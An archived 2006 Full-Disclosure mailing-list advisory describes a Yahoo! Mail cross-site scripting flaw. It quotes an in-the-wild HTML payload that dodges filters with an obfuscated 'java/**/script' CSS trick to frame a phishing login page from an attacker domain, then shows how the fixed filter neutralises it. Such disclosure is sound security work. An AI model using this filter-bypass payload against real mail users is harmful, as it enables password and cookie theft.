Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability

from [Cesar] Network Security [Permanent Link]
Subject: [Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability
Date: Fri, 28 Apr 2006 10:08:44 -0700 (PDT) 
Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(java/**/script:document.write('<frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:

  ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(_java/**/script:document.write('<xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><xframe frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

Now filters were improved, whenever the word
javascript appears a "_" is appended at the begining,
and a "x" is appended at the begining of dangerous
HTML tags.

Again Yahoo! didn't released any advisory nor
contacted customers about this issue. 
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam
protection around 
http://mail.yahoo.com 

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability, Cesar <=
Previous by Date:  Cireos Portal Cross Site Scripting, outlaw
Next by Date:  [Full-disclosure] [ GLSA 200604-18 ] Mozilla Suite: Multiple vulnerabilities, Thierry Carrez
Previous by Thread:  Cireos Portal Cross Site Scripting, outlaw
Next by Thread:  [Full-disclosure] [ GLSA 200604-18 ] Mozilla Suite: Multiple vulnerabilities, Thierry Carrez
Indexes:  [Date] [Thread] [Top] [All Lists]